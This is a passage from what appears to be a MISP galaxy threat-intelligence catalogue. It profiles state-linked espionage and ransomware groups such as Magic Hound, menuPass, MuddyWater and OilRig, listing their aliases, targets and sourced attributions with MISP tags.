[LuminousMoth](https://app.tidalcyber.com/groups/b10aa4c0-10a1-5e08-8d9d-82ce95d45e6a) is a Chinese-speaking cyber espionage group that has been active since at least October 2020. [LuminousMoth](https://app.tidalcyber.com/groups/b10aa4c0-10a1-5e08-8d9d-82ce95d45e6a) has targeted high-profile organizations, including government entities, in Myanmar, the Philippines, Thailand, and other parts of Southeast Asia. Some security researchers have concluded there is a connection between [LuminousMoth](https://app.tidalcyber.com/groups/b10aa4c0-10a1-5e08-8d9d-82ce95d45e6a) and [Mustang Panda](https://app.tidalcyber.com/groups/4a4641b1-7686-49da-8d83-00d8013f4b47) based on similar targeting and TTPs, as well as network infrastructure overlaps.<sup>[[Kaspersky LuminousMoth July 2021](https://app.tidalcyber.com/references/e21c6931-fba8-52b0-b6f0-1c8222881fbd)]</sup><sup>[[Bitdefender LuminousMoth July 2021](https://app.tidalcyber.com/references/6b1ce8bb-4e77-59f3-87ff-78f4a1a10ad3)]</sup>

The tag is: misp-galaxy:groups="LuminousMoth"

APT-C-43 - Associated Group

The tag is: misp-galaxy:groups="APT-C-43 - Associated Group"

El Machete - Associated Group

The tag is: misp-galaxy:groups="El Machete - Associated Group"

Machete

[Machete](https://app.tidalcyber.com/groups/a3be79a2-3d4f-4697-a8a1-83f0884220af) is a suspected Spanish-speaking cyber espionage group that has been active since at least 2010. It has primarily focused its operations within Latin America, with a particular emphasis on Venezuela, but also in the US, Europe, Russia, and parts of Asia. [Machete](https://app.tidalcyber.com/groups/a3be79a2-3d4f-4697-a8a1-83f0884220af) generally targets high-profile organizations such as government institutions, intelligence services, and military units, as well as telecommunications and power companies.<sup>[[Cylance Machete Mar 2017](https://app.tidalcyber.com/references/92a9a311-1e0b-4819-9856-2dfc8dbfc08d)]</sup><sup>[[Securelist Machete Aug 2014](https://app.tidalcyber.com/references/fc7be240-bd15-4ec4-bc01-f8891d7210d9)]</sup><sup>[[ESET Machete July 2019](https://app.tidalcyber.com/references/408d5e33-fcb6-4d21-8be9-7aa5a8bd3385)]</sup><sup>[[360 Machete Sep 2020](https://app.tidalcyber.com/references/682c843d-1bb8-4f30-9d2e-35e8d41b1976)]</sup>

The tag is: misp-galaxy:groups="Machete"

Phosphorus - Associated Group

<sup>[[Microsoft Phosphorus Mar 2019](https://app.tidalcyber.com/references/c55a112d-4b05-4c32-a5b3-480b12929115)]</sup><sup>[[Microsoft Phosphorus Oct 2020](https://app.tidalcyber.com/references/8986c21c-16a0-4a53-8e37-9935bbbfaa4b)]</sup><sup>[[US District Court of DC Phosphorus Complaint 2019](https://app.tidalcyber.com/references/8f73a709-fb7e-4d9e-9743-4ba39ea26ea8)]</sup><sup>[[Certfa Charming Kitten January 2021](https://app.tidalcyber.com/references/c38a8af6-3f9b-40c3-8122-a2a51eb50664)]</sup><sup>[[Proofpoint TA453 March 2021](https://app.tidalcyber.com/references/5ba4217c-813b-4cc5-b694-3a4dcad776e4)]</sup><sup>[[Check Point APT35 CharmPower January 2022](https://app.tidalcyber.com/references/81dce660-93ea-42a4-902f-0c6021d30f59)]</sup>

The tag is: misp-galaxy:groups="Phosphorus - Associated Group"

TA453 - Associated Group

The tag is: misp-galaxy:groups="TA453 - Associated Group"

Charming Kitten - Associated Group

<sup>[[ClearSky Charming Kitten Dec 2017](https://app.tidalcyber.com/references/23ab1ad2-e9d4-416a-926f-6220a59044ab)]</sup><sup>[[Eweek Newscaster and Charming Kitten May 2014](https://app.tidalcyber.com/references/a3407cd2-d579-4d64-8f2e-162c31a99534)]</sup><sup>[[ClearSky Kittens Back 2 Oct 2019](https://app.tidalcyber.com/references/f5114978-2528-4199-a586-0158c5f8a138)]</sup><sup>[[ClearSky Kittens Back 3 August 2020](https://app.tidalcyber.com/references/a10c6a53-79bb-4454-b444-cfb9136ecd36)]</sup><sup>[[Proofpoint TA453 March 2021](https://app.tidalcyber.com/references/5ba4217c-813b-4cc5-b694-3a4dcad776e4)]</sup><sup>[[Check Point APT35 CharmPower January 2022](https://app.tidalcyber.com/references/81dce660-93ea-42a4-902f-0c6021d30f59)]</sup>

The tag is: misp-galaxy:groups="Charming Kitten - Associated Group"

Newscaster - Associated Group

Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).<sup>[[Unit 42 Magic Hound Feb 2017](https://app.tidalcyber.com/references/f1ef9868-3ddb-4289-aa92-481c35517920)]</sup><sup>[[FireEye APT35 2018](https://app.tidalcyber.com/references/71d3db50-4a20-4d8e-a640-4670d642205c)]</sup>

The tag is: misp-galaxy:groups="Newscaster - Associated Group"

COBALT ILLUSION - Associated Group

<sup>[[Secureworks COBALT ILLUSION Threat Profile](https://app.tidalcyber.com/references/8d9a5b77-2516-4ad5-9710-4c8165df2882)]</sup>

The tag is: misp-galaxy:groups="COBALT ILLUSION - Associated Group"

ITG18 - Associated Group

The tag is: misp-galaxy:groups="ITG18 - Associated Group"

APT35 - Associated Group

The tag is: misp-galaxy:groups="APT35 - Associated Group"

Magic Hound

[Magic Hound](https://app.tidalcyber.com/groups/7a9d653c-8812-4b96-81d1-b0a27ca918b4) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.<sup>[[FireEye APT35 2018](https://app.tidalcyber.com/references/71d3db50-4a20-4d8e-a640-4670d642205c)]</sup><sup>[[ClearSky Kittens Back 3 August 2020](https://app.tidalcyber.com/references/a10c6a53-79bb-4454-b444-cfb9136ecd36)]</sup><sup>[[Certfa Charming Kitten January 2021](https://app.tidalcyber.com/references/c38a8af6-3f9b-40c3-8122-a2a51eb50664)]</sup><sup>[[Secureworks COBALT ILLUSION Threat Profile](https://app.tidalcyber.com/references/8d9a5b77-2516-4ad5-9710-4c8165df2882)]</sup><sup>[[Proofpoint TA453 July2021](https://app.tidalcyber.com/references/a987872f-2176-437c-a38f-58676b7b12de)]</sup>

The tag is: misp-galaxy:groups="Magic Hound"

MedusaLocker Ransomware Actors

MedusaLocker is a ransomware-as-a-service ("RaaS") operation that has been active since September 2019. U.S. cybersecurity authorities indicate that MedusaLocker operators have primarily targeted victims in the healthcare sector, among other unspecified sectors. Initial access for MedusaLocker intrusions originally came via phishing and spam email campaigns, but since 2022 has typically occurred via exploit of vulnerable Remote Desktop Protocol devices.<sup>[[HC3 Analyst Note MedusaLocker Ransomware February 2023](/references/49e314d6-5324-41e0-8bee-2b3e08d5e12f)]</sup>

This object represents behaviors associated with operators of MedusaLocker ransomware. As MedusaLocker is licensed on a RaaS model, affiliates likely do not act as a single cohesive unit, and behaviors observed during particular attacks may vary. Behaviors associated with samples of MedusaLocker ransomware are represented in the "MedusaLocker Ransomware" Software object.

The tag is: misp-galaxy:groups="MedusaLocker Ransomware Actors"

Medusa Ransomware Actors

Medusa is a ransomware operation that reportedly launched in June 2021. In 2023, the group launched a website used to publicize alleged victims. The group appears to be independent of the similarly named "MedusaLocker" operation.<sup>[[Bleeping Computer Medusa Ransomware March 12 2023](/references/21fe1d9e-17f1-49e2-b05f-78e9160f5414)]</sup>

According to data collected by the [ransomwatch project](https://github.com/joshhighet/ransomwatch) and analyzed by Tidal, Medusa actors publicly claimed around 90 victims through September 2023, ranking it ninth out of the 50+ ransomware operations in the dataset. These victims come from a wide variety of industry sectors and localities.<sup>[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)]</sup>

The tag is: misp-galaxy:groups="Medusa Ransomware Actors"

Stone Panda - Associated Group

The tag is: misp-galaxy:groups="Stone Panda - Associated Group"

CVNX - Associated Group

<sup>[[PWC Cloud Hopper April 2017](https://app.tidalcyber.com/references/fe741064-8cd7-428b-bdb9-9f2ab7e92489)]</sup><sup>[[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)]</sup><sup>[[District Court of NY APT10 Indictment December 2018](https://app.tidalcyber.com/references/79ccbc74-b9c4-4dc8-91ae-1d15c4db563b)]</sup>

The tag is: misp-galaxy:groups="CVNX - Associated Group"

Cicada - Associated Group

The tag is: misp-galaxy:groups="Cicada - Associated Group"

POTASSIUM - Associated Group

<sup>[[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)]</sup><sup>[[District Court of NY APT10 Indictment December 2018](https://app.tidalcyber.com/references/79ccbc74-b9c4-4dc8-91ae-1d15c4db563b)]</sup>

The tag is: misp-galaxy:groups="POTASSIUM - Associated Group"

APT10 - Associated Group

The tag is: misp-galaxy:groups="APT10 - Associated Group"

Red Apollo - Associated Group

<sup>[[PWC Cloud Hopper April 2017](https://app.tidalcyber.com/references/fe741064-8cd7-428b-bdb9-9f2ab7e92489)]</sup><sup>[[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)]</sup><sup>[[District Court of NY APT10 Indictment December 2018](https://app.tidalcyber.com/references/79ccbc74-b9c4-4dc8-91ae-1d15c4db563b)]</sup>

The tag is: misp-galaxy:groups="Red Apollo - Associated Group"

HOGFISH - Associated Group

The tag is: misp-galaxy:groups="HOGFISH - Associated Group"

menuPass

[menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) is a threat group that has been active since at least 2006. Individual members of [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) are known to have acted in association with the Chinese Ministry of State Security’s (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.<sup>[[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)]</sup><sup>[[District Court of NY APT10 Indictment December 2018](https://app.tidalcyber.com/references/79ccbc74-b9c4-4dc8-91ae-1d15c4db563b)]</sup>

[menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) has targeted healthcare, defense, aerospace, finance, maritime, biotechnology, energy, and government sectors globally, with an emphasis on Japanese organizations. In 2016 and 2017, the group is known to have targeted managed IT service providers (MSPs), manufacturing and mining companies, and a university.<sup>[[Palo Alto menuPass Feb 2017](https://app.tidalcyber.com/references/ba4f7d65-73ec-4726-b1f6-f2443ffda5e7)]</sup><sup>[[Crowdstrike CrowdCast Oct 2013](https://app.tidalcyber.com/references/2062a229-58b3-4610-99cb-8907e7fbb350)]</sup><sup>[[FireEye Poison Ivy](https://app.tidalcyber.com/references/c189447e-a903-4dc2-a38b-1f4accc64e20)]</sup><sup>[[PWC Cloud Hopper April 2017](https://app.tidalcyber.com/references/fe741064-8cd7-428b-bdb9-9f2ab7e92489)]</sup><sup>[[FireEye APT10 April 2017](https://app.tidalcyber.com/references/2d494df8-83e3-45d2-b798-4c3bcf55f675)]</sup><sup>[[DOJ APT10 Dec 2018](https://app.tidalcyber.com/references/3ddc68b4-53f1-4fa5-b7f3-4e5d7d9661f2)]</sup><sup>[[District Court of NY APT10 Indictment December 2018](https://app.tidalcyber.com/references/79ccbc74-b9c4-4dc8-91ae-1d15c4db563b)]</sup>

The tag is: misp-galaxy:groups="menuPass"

Metador

[Metador](https://app.tidalcyber.com/groups/a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b) is a suspected cyber espionage group that was first reported in September 2022. [Metador](https://app.tidalcyber.com/groups/a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b) has targeted a limited number of telecommunication companies, internet service providers, and universities in the Middle East and Africa. Security researchers named the group [Metador](https://app.tidalcyber.com/groups/a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b) based on the "I am meta" string in one of the group’s malware samples and the expectation of Spanish-language responses from C2 servers.<sup>[[SentinelLabs Metador Sept 2022](https://app.tidalcyber.com/references/137474b7-638a-56d7-9ce2-ab906f207175)]</sup>

The tag is: misp-galaxy:groups="Metador"

Moafee

[Moafee](https://app.tidalcyber.com/groups/4510ce41-27b9-479c-9bf3-a328b77bae29) is a threat group that appears to operate from the Guandong Province of China. Due to overlapping TTPs, including similar custom tools, Moafee is thought to have a direct or indirect relationship with the threat group [DragonOK](https://app.tidalcyber.com/groups/f2c2db08-624c-46b9-b7ed-b22c21b81813). <sup>[[Haq 2014](https://app.tidalcyber.com/references/4e10228d-d9da-4ba4-bca7-d3bbdce42e0d)]</sup>

The tag is: misp-galaxy:groups="Moafee"

Mofang

[Mofang](https://app.tidalcyber.com/groups/8bc69792-c26d-4493-87e3-d8e47605fed8) is a likely China-based cyber espionage group, named for its frequent practice of imitating a victim’s infrastructure. This adversary has been observed since at least May 2012 conducting focused attacks against government and critical infrastructure in Myanmar, as well as several other countries and sectors including military, automobile, and weapons industries.<sup>[[FOX-IT May 2016 Mofang](https://app.tidalcyber.com/references/f1a08b1c-f7d5-4a91-b3b7-0f042b297842)]</sup>

The tag is: misp-galaxy:groups="Mofang"

Operation Molerats - Associated Group

The tag is: misp-galaxy:groups="Operation Molerats - Associated Group"

Gaza Cybergang - Associated Group

The tag is: misp-galaxy:groups="Gaza Cybergang - Associated Group"

Molerats

[Molerats](https://app.tidalcyber.com/groups/679b7b6b-9659-4e56-9ffd-688a6fab01b6) is an Arabic-speaking, politically-motivated threat group that has been operating since 2012. The group’s victims have primarily been in the Middle East, Europe, and the United States.<sup>[[DustySky](https://app.tidalcyber.com/references/b9e0770d-f54a-4ada-abd1-65c45eee00fa)]</sup><sup>[[DustySky2](https://app.tidalcyber.com/references/4a3ecdec-254c-4eb4-9126-f540bb21dffe)]</sup><sup>[[Kaspersky MoleRATs April 2019](https://app.tidalcyber.com/references/38216a34-5ffd-4e79-80b1-7270743b728e)]</sup><sup>[[Cybereason Molerats Dec 2020](https://app.tidalcyber.com/references/81a10a4b-c66f-4526-882c-184436807e1d)]</sup>

The tag is: misp-galaxy:groups="Molerats"

Moses Staff

[Moses Staff](https://app.tidalcyber.com/groups/a41725c5-eb3a-4772-8d1e-17c3bbade79c) is a suspected Iranian threat group that has primarily targeted Israeli companies since at least September 2021. [Moses Staff](https://app.tidalcyber.com/groups/a41725c5-eb3a-4772-8d1e-17c3bbade79c) openly stated their motivation in attacking Israeli companies is to cause damage by leaking stolen sensitive data and encrypting the victim’s networks without a ransom demand.<sup>[[Checkpoint MosesStaff Nov 2021](https://app.tidalcyber.com/references/d6da2849-cff0-408a-9f09-81a33fc88a56)]</sup>

Security researchers assess [Moses Staff](https://app.tidalcyber.com/groups/a41725c5-eb3a-4772-8d1e-17c3bbade79c) is politically motivated, and has targeted government, finance, travel, energy, manufacturing, and utility companies outside of Israel as well, including those in Italy, India, Germany, Chile, Turkey, the UAE, and the US.<sup>[[Cybereason StrifeWater Feb 2022](https://app.tidalcyber.com/references/30c911b2-9a5e-4510-a78c-c65e84398c7e)]</sup>

The tag is: misp-galaxy:groups="Moses Staff"

MoustachedBouncer

[MoustachedBouncer](https://app.tidalcyber.com/groups/f31df12e-66ea-5a49-87bc-2bc1756a89fc) is a cyberespionage group that has been active since at least 2014 targeting foreign embassies in Belarus.<sup>[[MoustachedBouncer ESET August 2023](https://app.tidalcyber.com/references/9070f14b-5d5e-5f6d-bcac-628478e01242)]</sup>

The tag is: misp-galaxy:groups="MoustachedBouncer"

Static Kitten - Associated Group

<sup>[[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)]</sup><sup>[[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]</sup>

The tag is: misp-galaxy:groups="Static Kitten - Associated Group"

TEMP.Zagros - Associated Group

<sup>[[FireEye MuddyWater Mar 2018](https://app.tidalcyber.com/references/82cddfa6-9463-49bb-8bdc-0c7d6b0e1472)]</sup><sup>[[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)]</sup><sup>[[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]</sup>

The tag is: misp-galaxy:groups="TEMP.Zagros - Associated Group"

MERCURY - Associated Group

<sup>[[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)]</sup>

The tag is: misp-galaxy:groups="MERCURY - Associated Group"

Seedworm - Associated Group

<sup>[[Symantec MuddyWater Dec 2018](https://app.tidalcyber.com/references/a8e58ef1-91e1-4f93-b2ff-faa7a6365f5d)]</sup><sup>[[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)]</sup><sup>[[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]</sup>

The tag is: misp-galaxy:groups="Seedworm - Associated Group"

Earth Vetala - Associated Group

<sup>[[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]</sup>

The tag is: misp-galaxy:groups="Earth Vetala - Associated Group"

MuddyWater

[MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) is a cyber espionage group assessed to be a subordinate element within Iran’s Ministry of Intelligence and Security (MOIS).<sup>[[CYBERCOM Iranian Intel Cyber January 2022](https://app.tidalcyber.com/references/671e1559-c7dc-4cb4-a9a1-21776f2ae56a)]</sup> Since at least 2017, [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.<sup>[[Unit 42 MuddyWater Nov 2017](https://app.tidalcyber.com/references/dcdee265-2e46-4f40-95c7-6a2683edb23a)]</sup><sup>[[Symantec MuddyWater Dec 2018](https://app.tidalcyber.com/references/a8e58ef1-91e1-4f93-b2ff-faa7a6365f5d)]</sup><sup>[[ClearSky MuddyWater Nov 2018](https://app.tidalcyber.com/references/a5f60f45-5df5-407d-9f68-bc5f7c42ee85)]</sup><sup>[[ClearSky MuddyWater June 2019](https://app.tidalcyber.com/references/9789d60b-a417-42dc-b690-24ccb77b8658)]</sup><sup>[[Reaqta MuddyWater November 2017](https://app.tidalcyber.com/references/ecd28ccf-edb6-478d-a8f1-da630df42127)]</sup><sup>[[DHS CISA AA22-055A MuddyWater February 2022](https://app.tidalcyber.com/references/e76570e1-43ab-4819-80bc-895ede67a205)]</sup><sup>[[Talos MuddyWater Jan 2022](https://app.tidalcyber.com/references/a2d79c6a-16d6-4dbd-b8a5-845dcc36212d)]</sup>

The tag is: misp-galaxy:groups="MuddyWater"

TA416 - Associated Group

The tag is: misp-galaxy:groups="TA416 - Associated Group"

RedDelta - Associated Group

<sup>[[Recorded Future REDDELTA July 2020](https://app.tidalcyber.com/references/e2bc037e-d483-4670-8281-70e51b16effe)]</sup><sup>[[Proofpoint TA416 Europe March 2022](https://app.tidalcyber.com/references/5731d7e4-dd19-4d08-b493-7b1a467599d3)]</sup>

The tag is: misp-galaxy:groups="RedDelta - Associated Group"

BRONZE PRESIDENT - Associated Group

<sup>[[Secureworks BRONZE PRESIDENT December 2019](https://app.tidalcyber.com/references/019889e0-a2ce-476f-9a31-2fc394de2821)]</sup>

The tag is: misp-galaxy:groups="BRONZE PRESIDENT - Associated Group"

Mustang Panda

[Mustang Panda](https://app.tidalcyber.com/groups/4a4641b1-7686-49da-8d83-00d8013f4b47) is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. [Mustang Panda](https://app.tidalcyber.com/groups/4a4641b1-7686-49da-8d83-00d8013f4b47) has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Europe, Mongolia, Myanmar, Pakistan, and Vietnam, among others.<sup>[[Crowdstrike MUSTANG PANDA June 2018](https://app.tidalcyber.com/references/35e72170-b1ec-49c9-aefe-a24fc4302fa6)]</sup><sup>[[Anomali MUSTANG PANDA October 2019](https://app.tidalcyber.com/references/70277fa4-60a8-475e-993a-c74241b76127)]</sup><sup>[[Secureworks BRONZE PRESIDENT December 2019](https://app.tidalcyber.com/references/019889e0-a2ce-476f-9a31-2fc394de2821)]</sup>

The tag is: misp-galaxy:groups="Mustang Panda"

Naikon

[Naikon](https://app.tidalcyber.com/groups/a80c00b2-b8b6-4780-99bb-df8fe921947d) is assessed to be a state-sponsored cyber espionage group attributed to the Chinese People’s Liberation Army’s (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau (Military Unit Cover Designator 78020).<sup>[[CameraShy](https://app.tidalcyber.com/references/9942b6a5-6ffb-4a26-9392-6c8bb9954997)]</sup> Active since at least 2010, [Naikon](https://app.tidalcyber.com/groups/a80c00b2-b8b6-4780-99bb-df8fe921947d) has primarily conducted operations against government, military, and civil organizations in Southeast Asia, as well as against international bodies such as the United Nations Development Programme (UNDP) and the Association of Southeast Asian Nations (ASEAN).<sup>[[CameraShy](https://app.tidalcyber.com/references/9942b6a5-6ffb-4a26-9392-6c8bb9954997)]</sup><sup>[[Baumgartner Naikon 2015](https://app.tidalcyber.com/references/09302b4f-7f71-4289-92f6-076c685f0810)]</sup>

While [Naikon](https://app.tidalcyber.com/groups/a80c00b2-b8b6-4780-99bb-df8fe921947d) shares some characteristics with [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f), the two groups do not appear to be exact matches.<sup>[[Baumgartner Golovkin Naikon 2015](https://app.tidalcyber.com/references/5163576f-0b2c-49ba-8f34-b7efe3f3f6db)]</sup>

The tag is: misp-galaxy:groups="Naikon"

NEODYMIUM

[NEODYMIUM](https://app.tidalcyber.com/groups/3a660ef3-9954-4252-8946-f903f3f42d0c) is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims. The group has demonstrated similarity to another activity group called [PROMETHIUM](https://app.tidalcyber.com/groups/cc798766-8662-4b55-8536-6d057fbc58f0) due to overlapping victim and campaign characteristics. <sup>[[Microsoft NEODYMIUM Dec 2016](https://app.tidalcyber.com/references/87c9f8e4-f8d1-4f19-86ca-6fd18a33890b)]</sup> <sup>[[Microsoft SIR Vol 21](https://app.tidalcyber.com/references/619b9cf8-7201-45de-9c36-834ccee356a9)]</sup> [NEODYMIUM](https://app.tidalcyber.com/groups/3a660ef3-9954-4252-8946-f903f3f42d0c) is reportedly associated closely with [BlackOasis](https://app.tidalcyber.com/groups/428dc121-a593-4981-9127-f958ae0a0fdd) operations, but evidence that the group names are aliases has not been identified. <sup>[[CyberScoop BlackOasis Oct 2017](https://app.tidalcyber.com/references/a8224ad5-4688-4382-a3e7-1dd3ed74ebce)]</sup>

The tag is: misp-galaxy:groups="NEODYMIUM"

DustSquad - Associated Group

<sup>[[Security Affairs DustSquad Oct 2018](https://app.tidalcyber.com/references/0e6b019c-cf8e-40a7-9e7c-6a7dc5309dc6)]</sup><sup>[[Securelist Octopus Oct 2018](https://app.tidalcyber.com/references/77407057-53f1-4fde-bc74-00f73d417f7d)]</sup><sup>[[SecurityWeek Nomadic Octopus Oct 2018](https://app.tidalcyber.com/references/659f86ef-7e90-42ff-87b7-2e289f9f6cc2)]</sup>

The tag is: misp-galaxy:groups="DustSquad - Associated Group"

Nomadic Octopus

[Nomadic Octopus](https://app.tidalcyber.com/groups/5f8c6ee0-f302-403b-b712-f1e3df064c0c) is a Russian-speaking cyber espionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://app.tidalcyber.com/groups/5f8c6ee0-f302-403b-b712-f1e3df064c0c) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.<sup>[[Security Affairs DustSquad Oct 2018](https://app.tidalcyber.com/references/0e6b019c-cf8e-40a7-9e7c-6a7dc5309dc6)]</sup><sup>[[Securelist Octopus Oct 2018](https://app.tidalcyber.com/references/77407057-53f1-4fde-bc74-00f73d417f7d)]</sup><sup>[[ESET Nomadic Octopus 2018](https://app.tidalcyber.com/references/50dcb3f0-1461-453a-aab9-38c2e259173f)]</sup>

The tag is: misp-galaxy:groups="Nomadic Octopus"

IRN2 - Associated Group

<sup>[[Crowdstrike Helix Kitten Nov 2018](https://app.tidalcyber.com/references/3fc0d7ad-6283-4cfd-b72f-5ce47594531e)]</sup>

The tag is: misp-galaxy:groups="IRN2 - Associated Group"

APT34 - Associated Group

This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.<sup>[[Unit 42 QUADAGENT July 2018](https://app.tidalcyber.com/references/320f49df-7b0a-4a6a-8542-17b0f56c94c9)]</sup><sup>[[FireEye APT34 Dec 2017](https://app.tidalcyber.com/references/88f41728-08ad-4cd8-a418-895738d68b04)]</sup><sup>[[Check Point APT34 April 2021](https://app.tidalcyber.com/references/593e8f9f-88ec-4bdc-90c3-1a320fa8a041)]</sup>

The tag is: misp-galaxy:groups="APT34 - Associated Group"

COBALT GYPSY - Associated Group

<sup>[[Secureworks COBALT GYPSY Threat Profile](https://app.tidalcyber.com/references/f1c21834-7536-430b-8539-e68373718b4d)]</sup>

The tag is: misp-galaxy:groups="COBALT GYPSY - Associated Group"

Helix Kitten - Associated Group

The tag is: misp-galaxy:groups="Helix Kitten - Associated Group"

Evasive Serpens - Associated Group

The tag is: misp-galaxy:groups="Evasive Serpens - Associated Group"

OilRig

[OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.<sup>[[Palo Alto OilRig April 2017](https://app.tidalcyber.com/references/fb561cdd-03f6-4867-b5b5-7e4deb11f0d0)]</sup><sup>[[ClearSky OilRig Jan 2017](https://app.tidalcyber.com/references/f19f9ad4-bb31-443b-9c26-87946469a0c3)]</sup><sup>[[Palo Alto OilRig May 2016](https://app.tidalcyber.com/references/53836b95-a30a-4e95-8e19-e2bb2f18c738)]</sup><sup>[[Palo Alto OilRig Oct 2016](https://app.tidalcyber.com/references/14bbb07b-caeb-4d17-8e54-047322a5930c)]</sup><sup>[[Unit42 OilRig Playbook 2023](https://app.tidalcyber.com/references/e38902bb-9bab-5beb-817b-668a67a76541)]</sup><sup>[[FireEye APT34 Dec 2017](https://app.tidalcyber.com/references/88f41728-08ad-4cd8-a418-895738d68b04)]</sup><sup>[[Unit 42 QUADAGENT July 2018](https://app.tidalcyber.com/references/320f49df-7b0a-4a6a-8542-17b0f56c94c9)]</sup>

The tag is: misp-galaxy:groups="OilRig"

Orangeworm

[Orangeworm](https://app.tidalcyber.com/groups/863b7013-133d-4a82-93d2-51b53a8fd30e) is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015, likely for the purpose of corporate espionage.<sup>[[Symantec Orangeworm April 2018](https://app.tidalcyber.com/references/eee5efa1-bbc6-44eb-8fae-23002f351605)]</sup>

The tag is: misp-galaxy:groups="Orangeworm"

Chinastrats - Associated Group

The tag is: misp-galaxy:groups="Chinastrats - Associated Group"

MONSOON - Associated Group

MONSOON is the name of an espionage campaign; we use it here to refer to the actor group behind the campaign. <sup>[[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)]</sup> <sup>[[PaloAlto Patchwork Mar 2018](https://app.tidalcyber.com/references/2609e461-1e23-4dc2-aa44-d09f4acb8c6e)]</sup>

The tag is: misp-galaxy:groups="MONSOON - Associated Group"

Operation Hangover - Associated Group

It is believed that the actors behind [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) are the same actors behind Operation Hangover. <sup>[[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)]</sup> <sup>[[Operation Hangover May 2013](https://app.tidalcyber.com/references/fd581c0c-d93e-4396-a372-99cde3cd0c7c)]</sup>

The tag is: misp-galaxy:groups="Operation Hangover - Associated Group"

Hangover Group - Associated Group

[Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) and the Hangover Group have both been referenced as aliases for the threat group associated with Operation Monsoon.<sup>[[PaloAlto Patchwork Mar 2018](https://app.tidalcyber.com/references/2609e461-1e23-4dc2-aa44-d09f4acb8c6e)]</sup><sup>[[Unit 42 BackConfig May 2020](https://app.tidalcyber.com/references/f26629db-c641-4b6b-abbf-b55b9cc91cf1)]</sup><sup>[[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)]</sup>

The tag is: misp-galaxy:groups="Hangover Group - Associated Group"

Dropping Elephant - Associated Group

The tag is: misp-galaxy:groups="Dropping Elephant - Associated Group"

Patchwork

